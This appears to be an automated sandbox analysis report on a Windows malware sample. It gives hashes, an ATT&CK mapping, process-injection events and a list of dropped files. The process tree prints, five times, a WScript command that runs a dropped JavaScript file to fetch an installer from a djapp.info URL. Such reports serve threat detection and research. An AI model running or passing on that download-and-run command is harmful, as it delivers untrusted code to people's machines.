f8f223ecc842e99e7b1a30ac5f6688db165543ed45e42a17c35439ff25bb8888

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
29/05/2024, 05:34

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe
Size

184KB
MD5

7fa72441493abf24c04b12c5ac7dbd56
SHA1

a70d6874f2730ea2fd4efb20a402d5bcf6efcd06
SHA256

f8f223ecc842e99e7b1a30ac5f6688db165543ed45e42a17c35439ff25bb8888
SHA512

03a8f3b3da0512f06f030088d76327cad7aeb050dca105d2e60160a0a8db6c21a0652b2725c30c180b5bf4a035c21f13daee9ab246c88b154d2b1386d79684b6
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3qN:/7BSH8zUB+nGESaaRvoB7FJNndn/N

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	2532	WScript.exe
8	2532	WScript.exe
10	2532	WScript.exe
12	2404	WScript.exe
13	2404	WScript.exe
15	588	WScript.exe
16	588	WScript.exe
18	1168	WScript.exe
19	1168	WScript.exe
21	1204	WScript.exe
22	1204	WScript.exe
26	1204	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2212 wrote to memory of 2532	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	28
PID 2212 wrote to memory of 2532	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	28
PID 2212 wrote to memory of 2532	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	28
PID 2212 wrote to memory of 2532	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	28
PID 2212 wrote to memory of 2404	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	30
PID 2212 wrote to memory of 2404	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	30
PID 2212 wrote to memory of 2404	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	30
PID 2212 wrote to memory of 2404	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	30
PID 2212 wrote to memory of 588	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	32
PID 2212 wrote to memory of 588	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	32
PID 2212 wrote to memory of 588	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	32
PID 2212 wrote to memory of 588	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	32
PID 2212 wrote to memory of 1168	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	36
PID 2212 wrote to memory of 1168	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	36
PID 2212 wrote to memory of 1168	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	36
PID 2212 wrote to memory of 1168	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	36
PID 2212 wrote to memory of 1204	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	38
PID 2212 wrote to memory of 1204	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	38
PID 2212 wrote to memory of 1204	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	38
PID 2212 wrote to memory of 1204	2212	7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2212
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe
  2⤵
  - Blocklisted process makes network request
  PID:2532
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe
  2⤵
  - Blocklisted process makes network request
  PID:2404
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe
  2⤵
  - Blocklisted process makes network request
  PID:588
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe
  2⤵
  - Blocklisted process makes network request
  PID:1168
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe
  2⤵
  - Blocklisted process makes network request
  PID:1204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
b9a6ce2d8d958f97f33e4c90383555b0

SHA1
1dfc439a009c45eb482547d65aeee88675679279

SHA256
35c92a56b5f0f8520f27ee9b8d093c80deeb4f7599dbedfa8619559986db3c03

SHA512
0395ce6722e8663e946c8ab45bf6b28dde3d77c42ce893dd5d9174bb1c2c287b5ec4cb165ab2c606c13b39a72af14ea2d1b63bd3f21b766f8969b6d18db920f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
f2aaefc47cdf601b2ef2391bc1f0568c

SHA1
4ada6df6616e457f2472310b2ce251ae8827eb43

SHA256
f7ae547e9e6d16583b83ca761a4a40854aca923a722c82d4d68c376176e83a26

SHA512
d41bbad66596e0ab81b9bf8fb567e4038c5d625419746b983ccbd20514b1c6f55a4252ca22367ecba314fe4f481c40804a48ce8ac9c33985533cdfddc1b2b5fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9869b218a9fe9e0f5f69a18d208762de

SHA1
49a91740a6cbf261a6eb3db8e60218bb5a5548bb

SHA256
182e2924703a3ca6b8b215bbabaab27c8341caa9f0d417974bfd93c0cadad7dc

SHA512
eadd5d8ef570b404126954d13b2f9c107e22453fc45ea0a1f157aa816598bef18b1c377451f5dc5e5a5ed467c6e3e225f602b4dc27b12dcb87634e677f9c25a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
9fd0497ad5ad47d7845165819b03dda1

SHA1
80aa44c8a88e1744861d1943fb9a352282896657

SHA256
361992cbbcb522051c9fc29a1d6165826a23a855a064cbe995d6dc7c412383c8

SHA512
69f511f1de7f538190a871f90dcec819e4b5947e79c0cf4a686472f7e008b7e7dd28fe7304972a74012d07e26e9ed5fbcc2554dfe33ead5c726d5697e681fb8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
c3a95b05e4557e1e69b1392272e266d9

SHA1
b9bb5082baa76b48b5c35f50d3b3088755f19ecd

SHA256
7931b7f8e8c729804136abfd7eaff37c3641ab9cb03aca3b4003e2d3f98617d6

SHA512
855689fbe8675e54a5ff38f0505eb227d17942037236f9128ba1e9dafe3f865d4b2c26270e24d992b2bdb1cea6185a115c504a86c400911fb7d4dc5ab6bd11b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
de61f4ca9ef283baba50dcf520ec7b83

SHA1
7019687a366f8c9b8b6df5b22ff5812b22ff17de

SHA256
a9ba10df4f653bb85827b54afee986c7f5f85d6f0337976daaf6f72a778ce2d0

SHA512
eb75fa3589aa7f570ac7c99d01c7e9c0fa28f30ba9aab9e6b812df4b58ae961e03b40533d83a803f83b5034bbd4c1afe3b9770b8747769b271776ae9cd74bb4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
40KB

MD5
f2a2181a8d8421890a13bff21d32b23a

SHA1
6458f34f53a8221c160a2396e0d4ba46484d3fd0

SHA256
e14603765ede6bd5ceaf29d48dd598fbdb74522bec1c7bfb2081cdc59b191a94

SHA512
dd3f0930e60cc95faedd5d4aed5973711b10e9a7f3b37069284dfa8e2aa260d5a4076c611fe82284468e92e75c59200653368c6f2605d50108c99f4c5179b491

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
e6347c05ccfb6f48c26340b762f085df

SHA1
a5cba36f978b39710b93e24e564122fbaf0b58a5

SHA256
41cddc8332b75deac4ff5b7a530e3a710a718141210512f7bad21740a190fecd

SHA512
dc30f3bf3543e2f7c9be45010e6e1d9062bd0a22457561c5ffa5b0bb87ceff727165c650938fcc044eb1d74a4d224447b96c30b8199652318668e16e4fe715c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabCF21.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE80F.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf8862.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MBYRJKHI.txt

Filesize
177B

MD5
e8d7db60e1015ccec7a1b9d6f250c609

SHA1
5f3a1b2b72ca6081222448ddae47363a554c82e6

SHA256
f708ca5d1d37145144f83648f3e5ef5581854f9660a3e1e35546e35478fe11c9

SHA512
e4b1b06f918746998e8f70931d91f53e6cb4c4904442e6028a203b0fbb9e79cee9aeb32f7a0dc6a07c41b61ae1ddcb54bac4ae5f529aa1c5d2d20b50ff53cbfe

Download Submit